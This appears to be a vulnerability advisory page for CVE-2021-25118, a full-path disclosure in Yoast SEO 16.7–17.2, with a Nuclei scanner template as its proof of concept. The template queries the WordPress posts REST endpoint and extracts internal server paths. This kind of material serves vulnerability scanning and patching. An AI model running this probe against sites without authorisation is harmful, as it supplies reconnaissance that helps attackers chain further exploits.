CVE-2021-25118: Yoast SEO 16.7-17.2 - Information Disclosure

2025-08-01 Yoast SEO PoC Public

Description

Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.

PoC

id: CVE-2021-25118

info:
  name: Yoast SEO 16.7-17.2 - Information Disclosure
  author: DhiyaneshDK
  severity: medium
  description: Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the target system.
  remediation: Fixed in version 17.3.
  reference:
    - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550
    - https://plugins.trac.wordpress.org/changeset/2608691
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25118
    - https://github.com/20142995/sectool
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-25118
    cwe-id: CWE-200
    epss-score: 0.05632
    epss-percentile: 0.92745
    cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: yoast
    product: yoast_seo
    framework: wordpress
  tags: cve2021,cve,wpscan,wordpress,wp-plugin,fpd,wp,yoast,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/json"

      - type: regex
        regex:
          - '"path":"(.*)/wp-content\\(.*)","size'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '"path":"(.*)/wp-content\\(.*)","size'
        part: body
# digest: 4b0a004830460221008fa1ed22e1d8da41dc97c217e48b00770e7888d00e4756109b64bb0f32e49a57022100bdc1b90548819f24ed03e71ec4c7ae43b4eeb60637d56382e50ba172708534da:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities